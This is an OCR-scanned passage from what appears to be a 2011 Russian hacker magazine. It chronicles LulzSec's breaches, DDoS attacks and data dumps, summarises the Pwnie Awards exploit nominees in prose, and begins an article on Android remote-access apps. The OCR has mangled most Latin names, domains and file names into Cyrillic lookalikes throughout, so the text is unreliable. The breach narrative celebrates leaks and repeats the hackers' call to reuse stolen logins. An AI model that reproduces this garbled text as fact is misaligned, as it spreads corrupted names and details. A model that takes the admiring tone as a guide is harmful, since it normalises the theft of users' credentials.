Очередной позор 5опу еще не успел сойти с первых полос всех 
ІТ’шных изданий мира, а БиІгЗес уже работали над другими 
целями. Прошла всего неделя с момента взлома японского 
гиганта, и хакеры начали окончательно переквалифицироваться 
в хактивистов. Если раньше БиІгЗес забавлялись и, по боль- 
шому счету, лишь указывали компаниям и специалистам на 
бреши в системах безопасности (при этом немало веселя обще- 
ственность), то последующие хаки стали злее, и они уже имели 
определенную цель. 

Первым пострадал подрядчик ФБР — фирма Іпітабагсі. Эта 
атака, в отличие от предыдущих, являлась актом возмездия и 
недовольства, последовавшими в ответ на слова представи- 
телей НАТО и президента США Барака Обамы. В начале июня 
Обама и НАТО заявили, что хакерство в их глазах приравнивает- 
ся к военным действиям. 

В результате взлома ресурса іпітадагсіаиапіа.огд БиІгЭес уда- 
лось заполучить порядка 180 логинов, так или иначе связанных 




Официальный сайт ШІгБес приветствует 
посетителей веселой песенкой (кстати, 
пытаться отключить звук бесполезно :) 





Военных в очередной раз поимели 




Руперта Мердока внезапно объявили умершим 
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с ФБР. Более того, хакеры обнаружили, что Карим Хиджази 
(генеральный директор компании ІІпѵеіІІапсе, занимающейся 
сетевой безопасностью) использовал один тот же пароль для 
I пбга да гсі и для личного и рабочего почтовых ящиков. Благодаря 
этой оплошности БиІгЗес добрались до персональной перепи- 
ски Хиджази, до почты его компании и временно перехватили 
управление ботнетом, над которым ІІпѵеіІІапсе работала. Также 
хакеры с сарказмом сообщили, что Хиджази предлагал им день- 
ги, пытаясь откупиться. 

Он не хотел, чтобы информация о его некомпетентности стала 
достоянием общественности и предлагал БиІгЗес атаковать 
вместо ІІпѵеіІІапсе его коллег. Хиджази даже предложил хаке- 
рам помощь и обещал организовать некий «инсайд». Стоит ли 
говорить, что БиІгЗес денег не взяли, зато обнародовали всю 
переписку, логи и прочую подноготную горе-безопасника и его 



компании? Занимательное чтиво также доступно на сайте І_иІ 2 
Весигііу. Эту акцию группировка лаконично озаглавила как 
«Риск РВІ Ргібау». 

На следующий день, очевидно, в качестве небольшой разрядки 
после таких серьезных дел, БиІгЗес мимоходом хакнули Ыіпіепбо. 
В данном случае все было более или менее гуманно (насколько 
гуманным вообще может быть взлом). Никакие личные данные 
клиентов или компании не были скомпрометированы, БиІгЗес 
просто вторглись на сервер, покопались там и выложили на 
[иігзесигііу.сот конфиги сайта піпіепбо.сот . 

Еще через день группировка опять легонько пнула компанию 
5опу, теперь похитив исходники 5опу Сопприіег Епіегіаіптепі 
Оеѵеіорег ІМеІѵѵогк. Однако этот эпизод быстро забылся и канул 
в анналы истории, потому что за ним последовали хаки, которые 
шалостями уже не назовешь. 

А теперь серьезно. АпііЗес 

Превращение развеселых хакеров в хактивистов окончательно 
завершилось после того, как 13-го июня они заявили о взломе 
внутренней сети Сената США. 

Снова цитируем самих хакеров: 

«Приветствуем вас, друзья. Нам очень не нравится амери- 
канское правительство. 

У них слабые корабли, несмешные шутки, а их сайты плохо 
защищены. 

Мы попытались помочь им справиться с этими проблема- 
ми, поимев их еще разок и поделившись с ними своими 
лулзами. Для разогрева мы приводим небольшую порцию 
внутренних данных с Зепаіе.доѵ . Это военные действия, 
господа? Какие-то проблемы?». 

По информации Реиіегз, представитель Сената подтвердил, что 
атака на внутреннюю сеть Сената действительно имела место и 
добавил, что служба компьютерной безопасности американского 
конгресса проводит расследование инцидента. 

За этим неприличным жестом в сторону американских властей 
вновь последовал ряд менее опасных и более забавных атак. 
І_иІ 2 Боа! бросил якорь на порносайте Ргоп.сот . в итоге опубли- 
ковав 26 000 почтовых адресов и паролей, принадлежавших его 
пользователям. Хакеры призвали сетевой люд искать совпадаю- 
щие учетные данные и использовать их для входа в ЕасеЬоок и 
другие социальные сети. 

Впрочем, повеселиться толком не удалось, ведь крупнейшая 
социальная сеть планеты быстро отреагировала на эти заяв- 
ления, сопоставив просочившиеся в интернет етаіі-адреса со 
своей базой данных, и сбросила пароли этих юзеров. Кстати, 
некоторые источники уверяют, что среди 26 тысяч «счастливчи- 
ков» оказались деятели из правительства и вооруженных сил, 
которых постигли серьезные неприятности. 

В качестве вишенки на торте БиІгВес также обнародовали дан- 
ные о 55 руководителях других сайтов для взрослых. 

Потом хакеры обратили свой взор на игровую индустрию в 
целом и на компанию Веібезсіа ЗоІТѵѵогкз и ее подразделение 
ХепіМах Мебіа в частности. 

За что досталось создателям «Морровинда» не совсем ясно, 
скорее всего, в ход пошла логика, подобная логике Кевина 
Митника: «потому что можем». Тем не менее, факт остается фак- 
том: БиІгЗес украли и опубликовали множество етаіі-адресов, 
добытых в официальном блоге компании, на сайте игры В Р I N К, 
а также на внутреннем портале для поиска работы. Кроме того, 
группировка непрозрачно намекнула, что также заполучила на 
руки данные о 200 000 игроков В Р I N К и исходники Оиаке 4. 
Обнародовать эту информацию БиІгЗес не стали, ссылаясь на то, 
что якобы любят компанию Веібезба. Какой-то странною любо- 
вью, должны сказать мы. 

Геймеры, над которыми из-за проделок хакеров нависла угроза 
утечки личных данных, разумеется, недовольно зароптали. То ли 
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это позабавило БиФЭес, то ли план хакеров с самого начала был 
таков... Словом, не прошло и двух дней, как под шквалом лул- 
зов умерли сервера популярнейших игр — ЕѴЕ Опііпе, Езсарізі 
Мадагіпе, МіпесгаіТ и Ееадие оі 1 БедепсІБ. Комментарий БиФЗес 
на этот счет был краток, как никогда: 

«Мы сделали это, потому что они не могли остановить нас». 

И, переходя на совсем уже толстый троллинг, хакеры опублико- 
вали номер телефона горячей линии, по которому можно обра- 
титься и предложить следующую мишень. Звонившие по этому 
американскому номеру слышали сообщение некоего Пьера 
Дюбуа, который говорил с сильным французским акцентом. 

От такого поворота событий у геймеров и вовсе приключилась 
натуральная истерика. На 4сбап в незабвенном /Ь/ собралось 
форменное ополчение, жаждущее покарать БиІгБес, сдать их 
всех ФБР, линчевать, покарать, сжечь и съесть. Неважно, в 
какой последовательности. Призывы «если что-то о них знаете, 
позвоните в ФБР, мать вашу!» звучали громко. Интернет уже 
принялся запасаться попкорном, предвкушая эпическое про- 
тивостояние Анонимуса с БиФБес, однако все закончилось, не 
успев начаться. Федералам, надо думать, так никто не позвонил, 
зато БиІгЗес и Анонимус в скором времени объединились в еди- 
ном хактивистском порыве, объявив о начале операции АпбЗес. 
В преддверии АпбЭес, кстати, имел место еще один хак. 

БиФЭес решили не ограничиваться Сенатом и «пощупали» сайт 
Центрального разведывательного управления. Ничего серьез- 
ного с сіа.доѵ не случилось, однако сайт ненадолго вышел из 
строя. Причастность БиФЭес к этому инциденту задокументиро- 
вана в их «Твиттере»: «Танго сбит — сіа.доѵ — ради лулзов». 
Теперь вернемся к АпІіЭес. Стоит сказать, что движение с ана- 
логичным названием уже существовало в конце 90-х годов. 

Тогда хакеры под этим именем боролись с индустрией компью- 
терной безопасности, выражая свое несогласие с политикой 
полного раскрытия информации. Нынешняя операция АпОЗес, 
в свою очередь, была направлена против банков, корпораций, 
правительств и правительственных агентств, а также в целом 
против цензуры и контроля в Сети. 

Начало сотрудничества Анонимуса и БиІгБес ознаменовалось 
падением сайта британского агентства по борьбе с организован- 
ной преступностью. Судя по всему, в ход пошел обыкновенный 
ОБоЗ, из-за которого сайт не работал полдня. О причастности 
І_иІ 2 Зесигііу стало известно опять же благодаря «Твиттеру»: 
«Танго сбит — 1.со/ТЬдд09 — во имя #Ап*і5ес», — написали 
хакеры. 

Следующей мишенью стали сайты властей Бразилии, а именно 
сайт президента — ргезісІепсіа.доѵ.Ьг . правительства — Ьгазіі. 
доѵ.Ьг и казначейства. Очередное сообщение «Танго сбит» в 
Тѵѵіиег, нарушенная работа сайтов и, позже, заявление пресс- 
службы президента о том, что атака была успешно отбита, и 
никакими данными хакерам завладеть не удалось. Не трудно 
придти к выводу, что это опять был ББоЗ. 

Зато атака на Департамент общественной безопасности штата 
Аризона удалась на славу. Выражая протест против закона 
8В1070, который действует в Аризоне, и который представители 
БиІгЗес считают расистским и нарушающим права иммигрантов, 
хакеры вторглись на полицейские сервера. 

Эту операцию они назвали «СЫпда Іа тідга», что примерно 
переводится как «На хрен пограничные патрули». БиІгЗес раз- 
жились немалым количеством етаіі-адресов, паролей и доку- 
ментов разной степени секретности. Разумеется, все традицион- 
но было выложено в Сеть. 

Посмеялись и хватит 

Несмотря на то, что у БиІгЗес были большие планы, о которых 
они не стеснялись писать в «Твиттере» и не только, неожиданно 
наступила развязка. 

В 20-х числах июня СМИ сообщили о том, что в Великобритании, 



в Уикфорде (графство Эссекс) был арестован подозреваемый в 
причастности к атакам БиІгЗес. Его имя Райан Клири и извест- 
но, что парню всего 19 лет. Казалось бы, БиІгЗес лишь посмея- 
лись над этой НОВОСТЬЮ: 

«Похоже, прославленный лидер І_иІ23ес арестован, все кон- 
чено... хотя... нет, погодите, мы все еще здесь! Какого же 
несчастного они замели?». 

Однако спустя несколько дней, 26-го июня, хак-группа внезапно 
объявила о прекращении деятельности и уходе со сцены. 

«Наш запланированный 50-дневный круиз закончился, наста- 
ло время сказать: «В добрый путь!». Мы вынуждены уплыть 
вдаль, оставляя за собой — как мы надеемся — воодушевле- 
ние, страх, неприязнь, неодобрение, насмешки, неловкость, 
внимание, зависть, ненависть и даже любовь. Мы надеемся, 
помимо всего прочего, что мы хоть каким-то ничтожным обра- 
зом на кого-то повлияли», — сообщали хакеры, и все это подо- 
зрительно походило на хорошую мину при плохой игре. 

В прощальном послании БиФЗес также упомянули, что их было 
всего шестеро, и «за развеселой гримасой с радугами и цилин- 
драми мы — обычные люди». Также, что было вполне ожидаемо, 
БиІгЗес выразили большую веру в будущее движения АпбЗес, 
которое, по их мнению, должно продолжать жить, которое нужно 
нести в массы и распространять в Сети как можно дальше. 

На прощание БиІгЗес выложили на сайт и целую пачку различ- 
ных данных. Мы просто приведем список: 

АОЫпІегпаІ баіа.М 

АТ&Т іпіегпаі баіа.гаг 

ВаШеЛеФ Негоез Веіа (550 к изегз).сзѵ 

РВІ Ьеіпд зіІІу.М 

НаскФгшпз.пе* (200 к изегз).здІ 

Ыаіо-ЬоокзЬор.огд (12к изегз).сзѵ 

ОіФсе пеіѵѵогкз согрогабопз.Ш 

Ргіѵаіе ІпѵезЛдаіог ЕтаіІз.М 

РагФот датіпд Фгитз (50к изегз).М 

Зіііу гоіДегз.М 

паѵу.тіі оѵѵпеб.рпд 

Вскоре после роспуска БиФЗес в «Твиттере» Анонимуса (0 
АпопуплоизІРС) появилось сообщение: «Все члены гаі_иІ23ес на 
борту». Так ли это? Как знать. 

Кто они, эти шестеро, спросишь ты? Этим же вопросом уже 
третий месяц озадачены спецслужбы разных стран, компании, 
специализирующиеся на информационной безопасности, и не 
только они. 

Теорий много. Издание «Тбе Оиагбіап» в июне даже опублико- 
вало и анализировало логи с ІРС-канала #риге-еШ:е, на основе 
которых в Сети выстроено множество догадок. Сами члены І_иФ 
Зесигііу подтвердили, что утечка логов действительно была, но 
заметили, что на означенном канале собирается лишь своео- 
бразная группа поддержки БиФЗес, не имеющая к команде 
прямого отношения. Хакеры особенно подчеркнули, что фигу- 
рирующие в логах щеріе91 , Ыеигоп, Эіогпп, Ігоііроіі и ѵоосФо не 
являются членами экипажа І_иФ ВоаС а человек, сливший логи 
в Сеть, уже жестоко наказан. 

В самом ли деле группа ушла в подполье и прекратила свое 
существование? Неизвестно. «Твиттер» работает и обновляется, 
а всего несколько часов назад был взломан британский таблоид 
Тбе 5ип. На страницах издания разместили липовую информа- 
цию о смерти Руперта Мердока — владельца компании Ыеѵѵз 
Согрогаііоп. Кроме того, одновременно было атаковано подраз- 
деление ЫеѵѵБ Согрогаііоп — Ые\д/5 Іпіегпаііопаі и сайт газеты 
«ТЬе ТітеБ». Как ни странно, «Твиттер» БиФЗес непрозрачно 
намекает на причастность веселых хакеров к этим событиям. Так 
или иначе, но об этих парнях мы очевидно услышим еще далеко 
не раз. т 
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Пятая ежегодная 
хакерская премия: 
как это было? 



□ 



► 



©Уже пятый год подряд в конце 
лета объявляют номинантов на 
премию ТИе Рѵѵпіе Аѵѵагсіз. Зто 
своеобразный аналог «Оскара» 
или «Грэмми», но в сфере инфор- 
мационной безопасности. Самые 
нашумевшие серверные и кли- 
ентские баги. Самые крыше- 
сносящие исследования в обла- 
сти ИБ. Самые громкие взломы и 
эпические фейлы крупных ком- 
паний. Кто получил эти награды? 

Название премии — игра слов, происходящая от «рѵѵп\о\л/п» 
(поиметь, захватить, скомпрометировать) и слова «ропу» (пони, 
в смысле, маленькая лошадь). К тому же название переклика- 
ется с ТЬе Топу Аѵѵагсіз — известной театральной американской 
наградой, хотя, впрочем, какое нам дело до всех этих фонетиче- 
ских созвучий. Главное, что это одновременно и очень серьез- 
ное, и очень веселое мероприятие. Здесь учредители выставля- 
ют для награды самые серьезные исследования, которые даже 
на хакерских конференций понимает два с половиной человека. 
И здесь же стебутся над самыми нелепыми и эпическими про- 
валами крупных компаний. Все это действие проходит в рамках 
конференции Віаск На!, где и объявляются результаты. 
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За лучший серверный баг 

Премия вручается за обнаружение и эксплуатацию наиболее 
интересного и технически емкого бага в серверном софте. 
Сюда входят любые приложения, доступные удаленно без 
взаимодействия с пользователем. 



Уязвимости РасИіпд Огасіе 
в фреймворке А5Р.ЫЕТ ІСѴЕ-2010-3332) 




Джулиано и Тай показали, что фреймворк АВР.ІЧЕТ уязвим 
к атаке «Рабсііпд Огасіе», которая может быть использована 
для удаленной компрометации практически любого А5Р.ЫЕТ 
ѵѵеЬ-приложения, что в ряде случаев приводит к выполнению 
несанкционированного кода на сервере. 

Переполнение кучи 
в МісгозоП РТР (СѴЕ-2010-3972) 

Мэтт Берджин (Маи Вегдіп) 

Мэтт нашел уязвимость, приводящую к удаленному выполне- 
нию кода в ир-сервере от МісгозоЙ. Уязвимость существует 
из-за ошибки проверки границ данных при кодировании сим- 
волов Теіпеі ІАС (в частности, символа ОхРР). Уязвимость может 
быть использована безо всякой аутентификации: при помощи 
длинного, специально созданного РТР-запроса злоумышленник 
может вызвать переполнение в куче. Этот баг был использован 
Крисом Валасеком (СЬгіз Ѵаіазек) и Райаном Смитом (Руап 
ЭтііЫ, которые добились контроля над регистром ЕІР и этим 
показали, что возможен полноценный хек Ир-сервера. 

Инъекция метасимволов 
в І5С сІЬсІіеп* (СѴЕ-201 1-0997) 

Себастьян Крамер (ЗеЬазІіап КгаНтег) 
и Мариус Томашевски (Магіиз ТотазсЬеѵѵзкі) 

І5С сІЬсІіепІ не фильтровал определенные метасимволы в отве- 
тах от ОНСР-сервера. Независимые исследователи Себастьян 
и Мариус нашли этот баг и показали, что в зависимости от опе- 
рационной системы возможно выполнение произвольного кода 
на стороне клиента. Что особенно приятно, при помощи этой 
уязвимости один поддельный ОНСР-сервер может поиметь кучу 
клиентских машин во всей локальной сети. 

Переполнение стэка в инкапсуляции ІРСотр 
В50-систем (СѴЕ-201 1-1547) 

Тэвис Орманди (Таѵіз Огтапсіу) 

Большинство сетевых стеков ВЭй-происхождения содержат 
уязвимость в коде обработки инкапсуляции ІРСотр, обычно 
используемой вместе с ІРЭес. При помощи рекурсивных попы- 
ток деинкапсулировать из ІРСотр полезную нагрузку, взлом- 
щик может вызвать переполнение стека ядра (не переполне- 
ние буфера). По предположениям Тэвиса, это вполне возможно 
превратить в эксплоит для удаленного выполнения кода. 

Удаленное исполнение кода 
в Ехіт (СѴЕ-201 0-4344) 

Неизвестный автор 

Сплоит для почтового сервера Ехіт впервые был обнаружен 
Сергеем Кононенко, а его автор неизвестен. Эксплоит исполь- 
зует переполнение буфера в функциональности логирования 
для выполнения кода на сервере. Эксплоит был весьма инте- 
ресным, потому что вместо угона ЕІР, взломщик перезапи- 
сывал внутреннюю структуру данных зЬеІІ-командой, которая 
выполнялась при обработке сервером следующего сообщения. 



► 088 
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За лучший клиентский баг 

Вручается человеку, который открыл или проэксплуатировал 
наиболее интересный клиентский баг. Сегодняшняя реаль- 
ность такова, что слово «клиент» — это в значительной степени 

синоним к слову «браузер». 



Уязвимость РгееТуре в І05 (СѴЕ-201 1-0226) 




Сотех проэксплуатировал баг в интерпретаторе шрифтов Туре 
1 из библиотеки РгееТуре, используемой в мобильной версии 
Заба гі . Используя контроль над интерпретатором для конструи- 
рования сложных РОР-нагрузок, Сотех обошел А5І_Р в Ю5 и 
при помощи уязвимости в ядре сумел найти путь для выполне- 
ния неподписанного кода. Свой эксплоит Сотех залил на сайт 
]аіІЬгеакте.сот и тем самым помог джейлбрейкнуть свои і 05- 

устройства тысячам желающих. 

Побег из песочцницы боодіе СЬготе 

Компания ѴІІРЕМ 

Известная зесигііу-компания ѴІІРЕМ показала демку эксплоита 
для Ѳоодіе Сбготе, который обходит знаменитую своей надеж- 
ностью и навороченностью песочницу браузера от боодіе и 
запускает код с максимальными привилегиями на локальной 
системе. Эксплоит не попал в паблик, но зесигііу-команда 
Ѳоодіе предположила, что ѴІІРЕМ эксплуатировала какую-то 
уязвимость во Еіазб. Дело в том, что песочница для РІазЬ - 
плагина (а в Сбготе он теперь входит по умолчанию) намного 
слабее, чем песочница для процесса рендеринга НТМІ_- 
содержимого. Парни из ѴІІРЕМ дали понять, что, скорее всего, 
это утверждение близко к правде. 

Выполнение произвольного 
кода в Заѵа (СѴЕ-201 0-4452) 

Фредерик Хогуин (Ргесіегіс Нодиіп) 

Эта уязвимость особенно интересна тем, что использует воз- 
можность самой Оаѵа для произвольного выполнения кода. Она 
не опирается на какие-либо известные техники вроде перепол- 
нения буфера или повреждения памяти. Она применяет только 
известные фичи ОРЕ и на 100% надежна. 

Эксплоит для ВІаскЬеггу с конкурса Рѵѵп20ѵѵп 
Винченцо Лоззо (Ѵіпсепго Іогго), Вильем Пинкаерс (ѴѴіІІет 
Ріпскаегз), Ралф-Филипп Вейнманн (РаІ^-РЫШрр ѴѴеіптапп) 

Исследователи использовали две уязвимости ѴѴеЬКіІ и цело- 
численное переполнение, чтобы суметь выполнить код на 
устройствах ВІаскВеггу. Их достижение впечатляет еще 
больше, если взять в расчет тот факт, что у них не было под- 
ходящего отладчика, дампа ядра и какой-либо документации о 
внутренностях устройств компании РІМ. 

Х55 в магазине приложений АпсІгоісІ 

Джон Оберхейд роп ОЬегИеісіе) 

Джон Оберхейд обнаружил Х55-уязвимость в магазине при- 
ложений АпсІгоісІ, которая позволила ему устанавливать произ- 
вольное приложение на смартфоне жертвы, если та открывала 

зловредный линк. 
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За баг для повышения привилегий 

Присуждается человеку, который обнаружил и смог проэксплуа- 
тировать наиболее технически сложную и интересную уязви- 
мость для повышения привилегий. Чем больше набирают обо- 
рот защитные механизмы вроде виртуализации или мандатного 
управления доступом, тем большее значение получает этот тип 
уязвимостей. Особенно ценятся возможности для локального 
повышения привилегий в системе, выхода из песочницы и про- 
странства виртуальной машины. 

Поднятие привилегий в С5Р55 (СѴЕ-201 1-1 281) 

Мэтью «ДООги» Журчик (МаШіеѵѵ «ДООги» Зигсгук) 

Баг для повышения привилегий в ѴѴіпсІоѵѵз С8Р55, эксплоит 
для которого удалось написать благодаря интересным методам: 
спреингу указателей путем создания и освобождения сотен 
консолей, а также инъектированию данных в память процесса, 
который запущен какЭѴЭТЕМ (иііітап.ехе) с помощью генера- 
ции множества окон с чрезмерно длинными заголовками. 

Перезапись памяти ядра 
с помощью функции зеІ_1з (СѴЕ-201 0-4258) 

Нельсон Елхаж (Меізоп ЕІГіаде) 

Нельсон Елхаж нашел интересную связь между потоками І_іпих, 
созданными с флагом СІ_ОМЕ_СНІІ_Б_СІ_ЕАРТЮ и функцией 
зеМз Ішпсііоп в ядре, что сделало возможным на новом уровне 
использовать те баги, которые ранее могли вызвать разве что 
Бо5. Публичный РоС для этой уязвимостей был опубликован 
Дэном Росенбергом. 

Поднятие привилегий с помощью 
ипих$0Р1бт (СѴЕ-201 0-3847) 

Тавис Орманди (Таѵіз Огтапсіу) 

Тавис обнаружил, что динамический линковщик діібс недо- 
статочно корректно обрабатывает значение $0 РІ О I N для 
переменной окружения І_0_АІЮІТ, что позволяет локальным 
пользователям повысить привилегии во время запуска зеіиісі 
бинарников. Таким образом можно получить гооі’а. 



Уязвимости ѵѵіп32к изег-тосіе 
саІІЬаск'ов ядра ѴѴіпсІоѵѵз (М51 1 -034) 




В течение нескольких месяцев, Таржеи обнаружил более 40 
уязвимостей в ядре ѴѴіпсІоѵѵз. В его презентации на конферен- 
ции Іпбіігаіе 201 1 , он описал детали этих уязвимостей и техни- 
ки их эксплуатации. 



Победитель в номинации 

выделен цветом и отмечен значком: 



□ 
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За самое инновационное 
исследование 

Премия вручается людям, опубликовавшим наиболее инте- 
ресные и новаторские исследования в печатном виде, в виде 
презентаций, инструментариев или даже в виде постов из 

етаіі-рассылки. 

Зіаскіаскіпд 
Джон Оберхейд роп ОЬегЬеісІе), 
Ден Розенберг Шап РозепЬегд) 

Джон Оберхейд и Ден Розенберг представили ряд техник для 
эксплуатации уязвимостей ядра Ыпих на Огзес-системах и 
нечаянно развязали настоящую гонку вооружений с зрепсіег и 
РаХ Теат. Эта работа — великолепный пример исследования, 
сосредоточенного вокруг системы, эскпуатировать которую 

крайне трудно. 

Эксплуатация уязвимостей 
в РІазЬ АсІіопБсгірІ 
Хейфей Ли (Наі^еі І_і) 

Автор получил возможность эксплуатировать уязвимости ЛТ- 
уровня в Еіазб АсбопЭсгірІ на современных операционных 
системах, вроде ѴѴіпсІоѵѵз 7, обойдя одновременно и А5І_Н и ОЕР 
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За самую ламерскую 
реакцию вендора 

Премия вручается производителям, которые хуже всех справи- 
лись с уязвимостями в своих системах безопасности и наибо- 
лее эффектно сели в лужу. 

Удаленная эксплуатация переполнения 
стека в ОрепББН в ІМоѵеІІ ЫеІѴѴаге 

Вендор: ІЧоѵеІІ 

Ю\ асіѵізогу четко заявили, что обнаружили удаленно доступ- 
ную уязвимость переполнения стека, однако ІЧоѵеІІ. утверж- 
дали, что это был обыкновенный йоЗ и отказывались патчить 
дырку до тех пор, пока Ю\ не опубликовали подробности в 
своем блоге. С 0x41414141 не поспоришь. 

Мадіх Мизіс Макет 16 
переполнение стека 
Вендор: Мадіх 

Когда один из членов СОПЕІ_АЫ сообщил о наличии уязвимо- 
сти в программе Мизіс Макет 16, ему пригрозили судебным 
иском, если он опубликует РоС-эксплоит. Эксплоита в паблике 
так и не появилось, но всю информацию о дырке исследовате- 
ли непременно опубликовали. 



Аудит черным ящиком АсІоЬе БЬоскѵѵаѵе 

Аарон Портной (Аагоп Рогіпоу), Логан Браун (І_одап Вгоѵѵп) 

Данная презентация представляет собой всесторонний обзор 
ЗтагШеар — распределителя памяти в АбоЬе ЗЬоскѵѵаѵе. В 
доклад включено огромное количество полезных для 

реверсинга техник. 



Защита ядра с использованием 
| техники Біаііс Віпагу РеѵѵгШпд 



Одно дело претворить в жизнь какие-то идеи из рах-ФіигеТхІ:, 
и совсем другое — осуществить их путем статического анализа 
на ѴѴіпсІоѵѵз, автоматически [не опечатка!] переписать драйвера 
и сохранить совместимость, заставив все это работать на всем 

разнообразии версий ѴѴіпсІоѵѵз. 



-◄ 



Осмысление І_РН-хипа 

Крис Валасек (СИгіз Ѵаіазек) 

В этом оригинальном документе представлен детальный обзор 
Ьоѵѵ Егадтепіабоп Неар в ѴѴіпсІоѵѵз 7 и Ѵізіа. Трудно переоце- 
нить значимость данного исследования! 



□ 



Скомпрометированные 
токены Р5А БесигЮ ■ 




Их хакнули, все их ЭесигЮ токены были скомпрометированы. 
Но что сделали парни из Р5А? Фактически отмахнулись от 
этого, будто данное событие было совершенно незначитель- 
ным. Они сообщили своим клиентам о том, что замена токенов 
вовсе не является необходимой. Так продолжалось до тех пор, 
пока по вине Р5А не взломали Еоскбеесі-Магііп. 




► 090 
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За самый эпический фэйл 

Иногда ты выкладываешься на все 1 10%, но от этого твой фэйл 
лишь становится еще более смачным. И зачем был бы нужен 
интернет, если в нем не был бы задокументирован самый гром- 
кий фэйл всех времен и народов? Эта награда присуждается 
лицу или компании, потерпевшей(-ему) самый яркий еріс ба і I. 

Эта номинация в этом году представляет собой настоящий 
бенефис компании Эопу — в категории представлено шесть 
фэйлов и все они допущены японцами: 



Бопу 



Когда РаіІОѵегбІоѵѵ и ѲеоНоІ опубликовали информацию о том, 
как осуществить джейлбрейк Р53, Эопу слегка обиделась. 
Очевидно, там не имеют понятия, как работает интернет, и не 
знают, как трудно бывает очистить воду в бассейне от мочи. 
В Эопу упорно пытались удалить данные из интернета и засу- 
дить ѲеоНоГа и других хакеров, чтобы те канули в лету. Само 
собой, эти попытки увенчались таким же успехом, как и запуск 

МІПІВІ5С. 



Бопу 



Кстати, о моче в бассейне. Оказывается, столь же «хорошо» 
Эопу защищает личные данные пользователей Эопу Опііпе 
Епіегіаіптепі (ЭОЕ). Информация о примерно 25 млн аккаунтов 
ЭОЕ (всего там порядка 77 миллионов учеток) была украдена 
неизвестными хакерами. Эта метафора абсолютно лишена 
смысла, но суть ты уже понял: ЕАІІ_. 



Бопу 



Кое-что Эопу определенно делает хорошо — выпускает хиты 
и развлекает своих фанатов. Ой, погоди, мы сказали Эопу? 
Мы имели в виду ИиІгЭес, и, полагаем, что за это Эопу можно 

засчитать еще один ЕАІІ_. 



Бопу 



Эопу усвоила жестокий урок и поняла, что их РІауЭіаІіоп 
Ыеіѵѵогк дырявый, как сито. Компания была вынуждена 
закрыть РЭЫ на два месяца, чтобы переработать его с нуля. 
Решившись на этот шаг, они донесли до всех, начиная от 
твоей 8-летней сестренки и заканчивая твоим парикмахером, 
насколько важна безопасность. Радость для нас, и соболезно- 
вания акционерам Эопу. 



Бопу 



Ты уже заметил здесь определенную повторяющуюся схему? 
Погоди, дальше будет еще лучше! Вероятно, Эопу сумела бы 
лучше справиться с этими многочисленными атаками, если бы 
не недавние значительные сокращения в команде специали- 
стов по сетевой безопасности. Очень вовремя, чуваки. 




За Еріс Оѵѵпаде 

Премия Еріс Оѵѵпаде присуждается хакерам, ответственным за 
самые разрушительные, за самые широко известные или же 
просто за самые ржачные взломы. Также награды могут удо- 
стоиться и исследователи, ответственные за раскрытие уяз- 
вимостей или эксплоитов, которые породили в Сети огромное 
количество оѵѵѵѵ’ов (а именно так учредители конкурса измеря- 
ют степень Оѵѵпаде) . 

Анонимус за взлом НВбаггу Ресіегаі 

Если у тебя хреновая кастомная СМЭ, если ты используешь 
один и тот же пароль и на администраторском аккаунте и в 
Ѳоодіе Аррз, то тебе, пожалуй, не стоит затевать ссор с какими- 
либо хакерами. Лучше оставь этот рассерженный рой в покое. 
Как выяснилось, НВОагу Ресіегаі «страдали» всем вышеопи- 
санным, и Анонимус доставил им 1 ,21 гига-оѵѵѵѵ. 



І_иІі5ес за хак всех, кого только можно 

І_иІ 2 Эес доставили множество лулзов хакерами и специали- 
стам по безопасности со всего мира. Они атаковали Еох 
^ Ыеѵѵз, РВЭ, N іпбепсіо, ргоп.сот, І\ІНЭ, ІпбгадиагсІ, сенат США, 
Веібезсіа, МіпесгаЛ, І_еадие оі Шедепсіз, ТЬе Езсарізі, ЕѴЕ 
опііпе, ЦРУ, издания ТЬе Тіппез и ТЬе Эип. Все это время они 
генерировали вокруг себя невероятную медиаподдержку и 
успешно ускользали от правоохранительных органов. 

Бредли Менинг (ВгасІІеу Маппіпд) и ѴѴікіІеакз 

Якобы Бредли Менинг и ѴѴікіІеакз были орудиями в междуна- 
^ родном инциденте огромных масштабов, в ходе которого были 
посрамлены правительства многих стран мира. А виной всему 
был Сй Леди Гаги. 




Біихпе* 



Сколько центрифуг уничтожил твой руткит? Сколько госу- 
дарственных ядерных проектов разрушила твоя программа? 
Сколько нацеленных на оборудование Обау-эксплоитов и рут- 
китов, о которых никто никогда не слышал, ты написал? Вот 
именно. 



◄ 



08 

За лучшую песню 

На какой церемонии нет номинации «Лучшая песня»? Хакеры, 
пишущие песни и рэп (пародийный и оригинальный), это на 
удивление старая традиция. 

На прошедших Рѵѵпіе удалось заставить Нй и Наіѵаг читать 
рэп. С этого года, кстати, появилось обязательное требова- 
ния — все песни должны быть представлены в аудиоформате. 
Раньше же можно было обойтись только словами песни и в 
некоторых случаях музыкальным сопровождением. В этой кате- 
гории победил Джордж «беобоі» Хотц с эмоциональным рэпом 
о компании Эопу и судебном процессе. Его произведения, как 
и всех номинантов, ты можешь найти на нашем диске, □с 



□ 
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ІЛЧІХОЮ 



I Евгений Зобнин (ехесЬіЬги) 



\ 




Выбираем 

лучший 

АпсІгоісІ-софт для 
взаимодействия с 
компом 



БОЛЬШОЙ БРАТ 
И ЗЕЛЕНЫЙ РОБОТ 



* Благодаря открытому исходному коду и ядру І_іпих, лежащему в 
основе, АпсІгоісІ завоевал большую популярность среди продвинутых 
пользователей и гиков. Это, в конечном счете, привело к появлению 
большого количества открытых и бесплатных приложений, 
упрощающих жизнь всем, кто понимает, что в его кармане 
лежит не просто игрушка, а полноценный сетевой компьютер. 



В этой статье мы рассмотрим лучшие приложения для удаленного 
управления компом и самим смартфоном, выясним, можно ли ис- 
пользовать устройство под управлением АпсІгоісІ для слежения и 
управления сервером в дороге и узнаем, как проще и удобнее всего 
синхронизировать файлы «по воздуху». 

Синхронизируем файлы 

Наверное, одна из самых важных для нас функций смартфона — это 
простой и удобный способ синхронизации файлов с домашней 
машиной. Кажется, что с этим у АпсІгоісІ все в порядке: втыкаем шнур, 
выбираем в меню «доступ кЗЮ-карте» (в разных прошивках это мо- 



жетбыть реализовано по-разному) и видим новую флешку. Никаких 
драйверов, никакого дополнительного софта. Все просто работает 
и работает, надо сказать, хорошо. Воттолько передавать файлы по 
кабелю в наш беспроводной век как-то не слишком удобно, особенно 
если нужно скинуть файлы с компа соседа, который, может, и не имеет 
дома тісго-ІІЗВ-шнур. 

Гораздо удобнее слать файлы по воздуху с использованием ѴѴІ-РІ или 
ЗО-сетей, поддержка которых есть даже в самых бюджетных Ап б го іб- 
